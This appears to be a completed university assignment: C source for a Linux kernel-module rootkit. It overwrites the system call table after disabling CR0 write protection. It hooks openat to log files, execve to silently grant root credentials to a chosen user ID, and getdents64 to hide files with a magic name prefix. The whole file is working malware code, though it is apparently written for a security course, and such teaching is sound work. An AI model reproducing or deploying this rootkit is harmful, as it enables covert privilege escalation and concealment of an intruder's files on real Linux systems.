/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>

#ifndef __NR_getdents64
#define __NR_getdents64 248
#endif
#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents functions
*/
static t_syscall original_execve;
static t_syscall original_getdents;

/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static int root_uid;
module_param(root_uid, int, 0);
MODULE_PARM_DESC(root_uid, "Received root UID parameter");

//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */
static char* magic_prefix;
module_param(magic_prefix, charp, 0);
MODULE_PARM_DESC(magic_prefix, "Received magic prefix param");

/* 
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}

/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // allocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}

/*
 * My version of the execve is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook execve(). Our version will print to the
 * kernel which file the function was called for and the UID of the calling user.
*/
asmlinkage int new_execve(const struct pt_regs* regs) {
    long ret;
    char *command_name;
  
    // Allocate memory for the command name
    command_name = kmalloc(4096, GFP_KERNEL);

    // Copy the pathname (command name) from user space
    if (strncpy_from_user(command_name, (void*) regs->di, 4096) < 0) {
        kfree(command_name);
        return 0;
    }

    // Print the command name to the kernel log
    printk(KERN_INFO "Executing %s\n", command_name);
    printk(KERN_INFO "Effective UID %d\n", current_uid().val);

    // Check if the current user's UID matches the root_uid parameter that 
    // is passed in from the `insmod` command
    if (current_uid().val == root_uid) {
        // Prepare new credentials
        struct cred *new_creds;
        new_creds = prepare_kernel_cred(NULL);

        // Set the UID and EUID to 0
        new_creds->uid.val = 0;
        new_creds->euid.val = 0;

        // Commit the credentials
        commit_creds(new_creds);
    }

    kfree(command_name); // Free allocated memory

    // Invoke the original execve syscall
    ret = original_execve(regs);

    return ret;
}

asmlinkage int new_getdents(const struct pt_regs* regs) {
    long ret;
    int counter = 0;
    struct linux_dirent64 *curr_entry;
    char *buffer;

    // Allocate kernel memory for the buffer that will hold the directory entries
    buffer = kmalloc(4096, GFP_KERNEL);

    // Get the directory contents from original call
    ret = original_getdents(regs);

    // Copy the directory entries from user space to the kernel buffer
    if (copy_from_user(buffer, (void*)regs->si, ret) != 0) {
        kfree(buffer);
        return ret;
    }
    while (counter < ret) {
        // Get the current directory entry
        curr_entry = (struct linux_dirent64 *)(buffer + counter);

        // Print the name of the entry
        printk(KERN_INFO "entry:  %s\n", curr_entry->d_name);

        // Check if d_name begins with the magic_prefix
        if (strncmp(curr_entry->d_name, magic_prefix, strlen(magic_prefix)) == 0) {
            // If it does, remove the length of that entry from the buffer
            int len = curr_entry->d_reclen;
            memmove((void *)curr_entry, (void *)(buffer + counter + len), ret - counter - len);
            ret -= len;
            continue;
        }

        // increase counter to next entry
        counter += curr_entry->d_reclen;
    }

    // give the information about the entries that we modified back to the terminal
    if (copy_to_user((void*)regs->si, buffer, ret) != 0) {
        kfree(buffer);
        return -EFAULT;
    }

    // Free the memory
    kfree(buffer);

    return ret;
}


/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART B AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents functions.
  */

  // Let's store the original functions so they can be restored later
  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents = (t_syscall)__sys_call_table[__NR_getdents64];

  /*
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();
  
  /*
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
  __sys_call_table[__NR_openat] = (unsigned long) new_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents functions after writing them
  */

  // Let's hook execve() for privilege escalation
  __sys_call_table[__NR_execve] = (unsigned long) new_execve;
  // Let's hook getdents() to hide our files
  __sys_call_table[__NR_getdents64] = (unsigned long) new_getdents;

  /*
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();
  
  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();

  /*
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
  __sys_call_table[__NR_openat] = (unsigned long)original_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
  __sys_call_table[__NR_execve] = (unsigned long)original_execve;
  // Let's unhook and restore the original getdents() function
  __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents;

  /*
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup complete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
